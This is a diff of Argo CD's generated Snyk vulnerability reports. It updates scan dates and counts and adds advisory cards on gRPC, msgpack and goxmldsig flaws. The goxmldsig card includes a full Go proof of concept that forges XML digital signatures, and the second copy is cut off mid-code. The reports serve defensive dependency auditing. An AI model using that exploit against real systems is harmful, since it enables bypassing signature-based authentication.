        <li><a href="http://people.ubuntu.com/~ubuntu-security/cve/CVE-2025-0167">http://people.ubuntu.com/~ubuntu-security/cve/CVE-2025-0167</a></li>
--- a/docs/snyk/v3.2.7/argocd-iac-install.html
+++ b/docs/snyk/v3.2.7/argocd-iac-install.html
@@ -456,7 +456,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:35:48 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:40:14 am (UTC+00:00)</p>
              </div>
                <div class="source-panel">
                  <span>Scanned the following path:</span>
--- a/docs/snyk/v3.2.7/argocd-iac-namespace-install.html
+++ b/docs/snyk/v3.2.7/argocd-iac-namespace-install.html
@@ -456,7 +456,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:35:58 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:40:24 am (UTC+00:00)</p>
              </div>
                <div class="source-panel">
                  <span>Scanned the following path:</span>
--- a/docs/snyk/v3.2.7/argocd-test.html
+++ b/docs/snyk/v3.2.7/argocd-test.html
--- a/docs/snyk/v3.2.7/ghcr.io_dexidp_dex_v2.43.0.html
+++ b/docs/snyk/v3.2.7/ghcr.io_dexidp_dex_v2.43.0.html
@@ -7,7 +7,7 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Snyk test report</title>
-  <meta name="description" content="46 known vulnerabilities found in 141 vulnerable dependency paths.">
+  <meta name="description" content="48 known vulnerabilities found in 144 vulnerable dependency paths.">
  <base target="_blank">
  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
    sizes="194x194">
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:33:53 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:38:26 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following paths:</span>
@@ -505,8 +505,8 @@
              </div>
    
              <div class="meta-counts">
-                <div class="meta-count"><span>46</span> <span>known vulnerabilities</span></div>
-                <div class="meta-count"><span>141 vulnerable dependency paths</span></div>
+                <div class="meta-count"><span>48</span> <span>known vulnerabilities</span></div>
+                <div class="meta-count"><span>144 vulnerable dependency paths</span></div>
                <div class="meta-count"><span>1131</span> <span>dependencies</span></div>
              </div><!-- .meta-counts -->
            </div><!-- .layout-container--short -->
@@ -515,6 +515,89 @@

    <div class="layout-container" style="padding-top: 35px;">
      <div class="cards--vuln filter--patch filter--ignore">
+        <div class="card card--vuln  disclosure--not-new severity--critical" data-snyk-test="critical">
+            <h2 class="card__title">Incorrect Authorization</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--critical">
+                        <span class="label__text">critical severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            google.golang.org/grpc
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/hairyhenderson/gomplate/v4@* and google.golang.org/grpc@v1.68.1
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/hairyhenderson/gomplate/v4@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.68.1
+                                        
+                                </span>
+        
+                            </li>
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/dexidp/dex@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.72.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
+        <h2 id="workaround">Workaround</h2>
+        <p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">CVE-2025-69421</h2>
            <div class="card__section">
@@ -1055,6 +1138,193 @@
                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
+            <h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--high">
+                        <span class="label__text">high severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Proof of Concept</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: ghcr.io/dexidp/dex:v2.43.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/russellhaering/goxmldsig
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/dexidp/dex@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/russellhaering/goxmldsig@v1.5.0
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
+        <p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
+        <h2 id="poc">PoC</h2>
+        <pre><code>package main
+        
+        import (
+            &quot;crypto/rand&quot;
+            &quot;crypto/rsa&quot;
+            &quot;crypto/tls&quot;
+            &quot;crypto/x509&quot;
+            &quot;encoding/base64&quot;
+            &quot;fmt&quot;
+            &quot;math/big&quot;
+            &quot;time&quot;
+        
+            &quot;github.com/beevik/etree&quot;
+            dsig &quot;github.com/russellhaering/goxmldsig&quot;
+        )
+        
+        func main() {
+            key, err := rsa.GenerateKey(rand.Reader, 2048)
+            if err != nil {
+                panic(err)
+            }
+        
+            template := &amp;x509.Certificate{
+                SerialNumber: big.NewInt(1),
+                NotBefore:    time.Now().Add(-1 * time.Hour),
+                NotAfter:     time.Now().Add(1 * time.Hour),
+            }
+        
+            certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
+            if err != nil {
+                panic(err)
+            }
+        
+            cert, _ := x509.ParseCertificate(certDER)
+        
+            doc := etree.NewDocument()
+            root := doc.CreateElement(&quot;Root&quot;)
+            root.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
+            root.SetText(&quot;Malicious Content&quot;)
+        
+            tlsCert := tls.Certificate{
+                Certificate: [][]byte{cert.Raw},
+                PrivateKey:  key,
+            }
+        
+            ks := dsig.TLSCertKeyStore(tlsCert)
+            signingCtx := dsig.NewDefaultSigningContext(ks)
+        
+            sig, err := signingCtx.ConstructSignature(root, true)
+            if err != nil {
+                panic(err)
+            }
+        
+            signedInfo := sig.FindElement(&quot;./SignedInfo&quot;)
+        
+            existingRef := signedInfo.FindElement(&quot;./Reference&quot;)
+            existingRef.CreateAttr(&quot;URI&quot;, &quot;#dummy&quot;)
+        
+            originalEl := etree.NewElement(&quot;Root&quot;)
+            originalEl.CreateAttr(&quot;ID&quot;, &quot;target&quot;)
+            originalEl.SetText(&quot;Original Content&quot;)
+        
+            sig1, _ := signingCtx.ConstructSignature(originalEl, true)
+            ref1 := sig1.FindElement(&quot;./SignedInfo/Reference&quot;).Copy()
+        
+            signedInfo.InsertChildAt(existingRef.Index(), ref1)
+        
+            c14n := signingCtx.Canonicalizer
+        
+            detachedSI := signedInfo.Copy()
+            if detachedSI.SelectAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix) == nil {
+                detachedSI.CreateAttr(&quot;xmlns:&quot;+dsig.DefaultPrefix, dsig.Namespace)
+            }
+        
+            canonicalBytes, err := c14n.Canonicalize(detachedSI)
+            if err != nil {
+                fmt.Println(&quot;c14n error:&quot;, err)
+                return
+            }
+        
+            hash := signingCtx.Hash.New()
+            hash.Write(canonicalBytes)
+            digest := hash.Sum(nil)
+        
+            rawSig, err := rsa.SignPKCS1v15(rand.Reader, key, signingCtx.Hash, digest)
+            if err != nil {
+                panic(err)
+            }
+        
+            sigVal := sig.FindElement(&quot;./SignatureValue&quot;)
+            sigVal.SetText(base64.StdEncoding.EncodeToString(rawSig))
+        
+            certStore := &amp;dsig.MemoryX509CertificateStore{
+                Roots: []*x509.Certificate{cert},
+            }
+            valCtx := dsig.NewDefaultValidationContext(certStore)
+        
+            root.AddChild(sig)
+        
+            doc.SetRoot(root)
+            str, _ := doc.WriteToString()
+            fmt.Println(&quot;XML:&quot;)
+            fmt.Println(str)
+        
+            validated, err := valCtx.Validate(root)
+            if err != nil {
+                fmt.Println(&quot;validation failed:&quot;, err)
+            } else {
+                fmt.Println(&quot;validation ok&quot;)
+                fmt.Println(&quot;validated text:&quot;, validated.Text())
+            }
+        }
+        </code></pre>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>github.com/russellhaering/goxmldsig</code> to version 1.6.0 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/russellhaering/goxmldsig/commit/db3d1e31f7535d7f5debb49851b9e9a2ff08b936">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOXMLDSIG-15692488">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">Asymmetric Resource Consumption (Amplification)</h2>
--- a/docs/snyk/v3.2.7/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
+++ b/docs/snyk/v3.2.7/public.ecr.aws_docker_library_haproxy_3.0.8-alpine.html
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:33:58 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:38:31 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following path:</span>
--- a/docs/snyk/v3.2.7/public.ecr.aws_docker_library_redis_8.2.2-alpine.html
+++ b/docs/snyk/v3.2.7/public.ecr.aws_docker_library_redis_8.2.2-alpine.html
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:34:04 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:38:39 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following path:</span>
@@ -905,6 +905,7 @@
        <li><a href="https://github.com/openssl/openssl/commit/8caf359d6e46fb413e8f5f0df765d2e8a51df4e8">https://github.com/openssl/openssl/commit/8caf359d6e46fb413e8f5f0df765d2e8a51df4e8</a></li>
        <li><a href="https://github.com/openssl/openssl/commit/e1079bc17ed93ff16f6b86f33a2fe3336e78817e">https://github.com/openssl/openssl/commit/e1079bc17ed93ff16f6b86f33a2fe3336e78817e</a></li>
        <li><a href="https://openssl-library.org/news/secadv/20260127.txt">https://openssl-library.org/news/secadv/20260127.txt</a></li>
+        <li><a href="https://github.com/metadust/CVE-2025-11187">https://github.com/metadust/CVE-2025-11187</a></li>
        </ul>
        
              <hr/>
--- a/docs/snyk/v3.2.7/quay.io_argoproj_argocd_v3.2.7.html
+++ b/docs/snyk/v3.2.7/quay.io_argoproj_argocd_v3.2.7.html
@@ -7,7 +7,7 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Snyk test report</title>
-  <meta name="description" content="11 known vulnerabilities found in 12 vulnerable dependency paths.">
+  <meta name="description" content="13 known vulnerabilities found in 14 vulnerable dependency paths.">
  <base target="_blank">
  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
    sizes="194x194">
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:34:28 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:39:01 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following paths:</span>
@@ -506,8 +506,8 @@
              </div>
    
              <div class="meta-counts">
-                <div class="meta-count"><span>11</span> <span>known vulnerabilities</span></div>
-                <div class="meta-count"><span>12 vulnerable dependency paths</span></div>
+                <div class="meta-count"><span>13</span> <span>known vulnerabilities</span></div>
+                <div class="meta-count"><span>14 vulnerable dependency paths</span></div>
                <div class="meta-count"><span>2322</span> <span>dependencies</span></div>
              </div><!-- .meta-counts -->
            </div><!-- .layout-container--short -->
@@ -516,6 +516,80 @@

    <div class="layout-container" style="padding-top: 35px;">
      <div class="cards--vuln filter--patch filter--ignore">
+        <div class="card card--vuln  disclosure--not-new severity--critical" data-snyk-test="critical">
+            <h2 class="card__title">Incorrect Authorization</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--critical">
+                        <span class="label__text">critical severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.2.7/argoproj/argo-cd/v3 <span class="list-paths__item__arrow">›</span> /usr/local/bin/argocd
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            google.golang.org/grpc
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/argoproj/argo-cd/v3@* and google.golang.org/grpc@v1.75.1
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/argoproj/argo-cd/v3@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.75.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
+        <h2 id="workaround">Workaround</h2>
+        <p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">Untrusted Search Path</h2>
            <div class="card__section">
@@ -740,6 +814,79 @@
                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOLANGORGXNETHTML-15237740">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
+            <h2 class="card__title">Improper Validation of Specified Type of Input</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--medium">
+                        <span class="label__text">medium severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: quay.io/argoproj/argocd:v3.2.7/argoproj/argo-cd/v3 <span class="list-paths__item__arrow">›</span> /usr/local/bin/argocd
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/vmihailenco/msgpack/v5
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/argoproj/argo-cd/v3@* and github.com/vmihailenco/msgpack/v5@v5.4.1
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/argoproj/argo-cd/v3@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/vmihailenco/msgpack/v5@v5.4.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input in the calls plugin when handling websocket messages containing malformed msgpack frames. An attacker can cause the server to consume excessive memory and crash by sending specially crafted websocket requests.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>There is no fixed version for <code>github.com/vmihailenco/msgpack/v5</code>.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/mattermost/msgpack/commit/2f9c67d7e57f">GitHub Commit</a></li>
+        <li><a href="https://mattermost.com/security-updates">Mattermost Security Updates</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMVMIHAILENCOMSGPACKV5-15702238">More about this vulnerability</a></p>
+            </div>
+        
        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--medium" data-snyk-test="medium">
            <h2 class="card__title">MPL-2.0 license</h2>
--- a/docs/snyk/v3.3.4/argocd-iac-install.html
+++ b/docs/snyk/v3.3.4/argocd-iac-install.html
@@ -456,7 +456,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:33:23 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:37:44 am (UTC+00:00)</p>
              </div>
                <div class="source-panel">
                  <span>Scanned the following path:</span>
--- a/docs/snyk/v3.3.4/argocd-iac-namespace-install.html
+++ b/docs/snyk/v3.3.4/argocd-iac-namespace-install.html
@@ -456,7 +456,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:33:33 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:38:02 am (UTC+00:00)</p>
              </div>
                <div class="source-panel">
                  <span>Scanned the following path:</span>
--- a/docs/snyk/v3.3.4/argocd-test.html
+++ b/docs/snyk/v3.3.4/argocd-test.html
--- a/docs/snyk/v3.3.4/ghcr.io_dexidp_dex_v2.43.0.html
+++ b/docs/snyk/v3.3.4/ghcr.io_dexidp_dex_v2.43.0.html
@@ -7,7 +7,7 @@
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>Snyk test report</title>
-  <meta name="description" content="46 known vulnerabilities found in 141 vulnerable dependency paths.">
+  <meta name="description" content="48 known vulnerabilities found in 144 vulnerable dependency paths.">
  <base target="_blank">
  <link rel="icon" type="image/png" href="https://res.cloudinary.com/snyk/image/upload/v1468845142/favicon/favicon.png"
    sizes="194x194">
@@ -492,7 +492,7 @@
              <div class="header-wrap">
                  <h1 class="project__header__title">Snyk test report</h1>
    
-                <p class="timestamp">March 8th 2026, 12:31:08 am (UTC+00:00)</p>
+                <p class="timestamp">March 22nd 2026, 12:35:42 am (UTC+00:00)</p>
              </div>
              <div class="source-panel">
                <span>Scanned the following paths:</span>
@@ -505,8 +505,8 @@
              </div>
    
              <div class="meta-counts">
-                <div class="meta-count"><span>46</span> <span>known vulnerabilities</span></div>
-                <div class="meta-count"><span>141 vulnerable dependency paths</span></div>
+                <div class="meta-count"><span>48</span> <span>known vulnerabilities</span></div>
+                <div class="meta-count"><span>144 vulnerable dependency paths</span></div>
                <div class="meta-count"><span>1131</span> <span>dependencies</span></div>
              </div><!-- .meta-counts -->
            </div><!-- .layout-container--short -->
@@ -515,6 +515,89 @@

    <div class="layout-container" style="padding-top: 35px;">
      <div class="cards--vuln filter--patch filter--ignore">
+        <div class="card card--vuln  disclosure--not-new severity--critical" data-snyk-test="critical">
+            <h2 class="card__title">Incorrect Authorization</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--critical">
+                        <span class="label__text">critical severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Not Defined</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: ghcr.io/dexidp/dex:v2.43.0/hairyhenderson/gomplate/v4 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            google.golang.org/grpc
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/hairyhenderson/gomplate/v4@* and google.golang.org/grpc@v1.68.1
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/hairyhenderson/gomplate/v4@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.68.1
+                                        
+                                </span>
+        
+                            </li>
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/dexidp/dex@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        google.golang.org/grpc@v1.72.1
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p>Affected versions of this package are vulnerable to Incorrect Authorization in the processing of HTTP/2 <code>:path</code> pseudo-headers in <code>handleStream()</code>. An attacker can gain unauthorized access to restricted resources by sending requests with malformed <code>:path</code> headers that omit the leading slash. This is only exploitable if the server uses path-based authorization interceptors, has deny rules that use canonical paths with leading slashes, and has a fallback allow rule in its policy.</p>
+        <h2 id="workaround">Workaround</h2>
+        <p>This vulnerability can be mitigated by adding a validating interceptor that rejects requests with malformed paths, configuring infrastructure (such as reverse proxies) to enforce strict HTTP/2 compliance, or switching to a default-deny authorization policy.</p>
+        <h2 id="remediation">Remediation</h2>
+        <p>Upgrade <code>google.golang.org/grpc</code> to version 1.79.3 or higher.</p>
+        <h2 id="references">References</h2>
+        <ul>
+        <li><a href="https://github.com/grpc/grpc-go/commit/72186f163e75a065c39e6f7df9b6dea07fbdeff5">GitHub Commit</a></li>
+        </ul>
+        
+              <hr/>
+        
+            <div class="cta card__cta">
+                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOGLEGOLANGORGGRPC-15691172">More about this vulnerability</a></p>
+            </div>
+        
+        </div><!-- .card -->
        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
            <h2 class="card__title">CVE-2025-69421</h2>
            <div class="card__section">
@@ -1055,6 +1138,193 @@
                <p><a href="https://snyk.io/vuln/SNYK-GOLANG-GOOPENTELEMETRYIOOTELSDKRESOURCE-15182758">More about this vulnerability</a></p>
            </div>
        
+        </div><!-- .card -->
+        <div class="card card--vuln  disclosure--not-new severity--high" data-snyk-test="high">
+            <h2 class="card__title">Improper Verification of Cryptographic Signature</h2>
+            <div class="card__section">
+        
+                <div class="card__labels">
+                    <div class="label label--high">
+                        <span class="label__text">high severity</span>
+                    </div>
+                    <div class="label label--exploit">
+                        <span class="label__text">Exploit: Proof of Concept</span>
+                    </div>
+                </div>
+        
+                <hr/>
+        
+                <ul class="card__meta">
+                    <li class="card__meta__item">
+                        Manifest file: ghcr.io/dexidp/dex:v2.43.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
+                    </li>
+                    <li class="card__meta__item">
+                        Package Manager: golang
+                    </li>
+                    <li class="card__meta__item">
+                            Vulnerable module:
+        
+                            github.com/russellhaering/goxmldsig
+                    </li>
+        
+                    <li class="card__meta__item">Introduced through:
+        
+                                github.com/dexidp/dex@* and github.com/russellhaering/goxmldsig@v1.5.0
+        
+                    </li>
+                </ul>
+        
+                <hr/>
+        
+        
+                        <h3 class="card__section__title">Detailed paths</h3>
+        
+                    <ul class="card__meta__paths">
+                                <li>
+                                <span class="list-paths__item__introduced"><em>Introduced through</em>:
+                                        github.com/dexidp/dex@*
+                                         <span class="list-paths__item__arrow">›</span> 
+                                        github.com/russellhaering/goxmldsig@v1.5.0
+                                        
+                                </span>
+        
+                            </li>
+                    </ul><!-- .list-paths -->
+        
+            </div><!-- .card__section -->
+        
+              <hr/>
+              <!-- Overview -->
+              <h2 id="overview">Overview</h2>
+        <p><a href="https://github.com/russellhaering/goxmldsig">github.com/russellhaering/goxmldsig</a> is a XML Digital Signatures implemented in pure Go.</p>
+        <p>Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the <code>validateSignature</code> function in the <code>validate.go</code> file. An attacker can bypass integrity checks and alter the contents of signed elements by exploiting pointer aliasing on a loop variable, allowing them to replace one element&#39;s contents with another referenced element&#39;s.</p>
+        <h2 id="poc">PoC</h2>
+        <pre><code>package main
+        
+        import (
+            &quot;crypto/rand&quot;
+            &quot;crypto/rsa&quot;
+            &quot;crypto/tls&quot;
+            &quot;crypto/x509&quot;
+            &quot;encoding/base64&quot;
+            &quot;fmt&quot;
+            &quot;math/big&quot;
+            &quot;time&quot;
+        
+            &quot;github.com/beevik/etree&quot;
+            dsig &quot;github.com/russellhaering/goxmldsig&quot;
+        )
+        
+        func main() {
+            key, err := rsa.GenerateKey(rand.Reader, 2048)
+            if err != nil {
+                panic(err)
+            }
+        
+            template := &amp;x509.Certificate{
+                SerialNumber: big.NewInt(1),
+                NotBefore:    time.Now().Add(-1 * time.Hour),
+                NotAfter:     time.Now().Add(1 * time.Hour),
+            }
+        
+            certDER, err := x509.CreateCertificate(rand.Reader, template, template, &amp;key.PublicKey, key)
+            if err != nil {
+                panic(err)
+            }
+        
+            cert, _ := x509.ParseCertificate(certDER)
+        
+            doc := etree.NewDocument()
+            root := doc.CreateElement(&quot;Root&quot;)
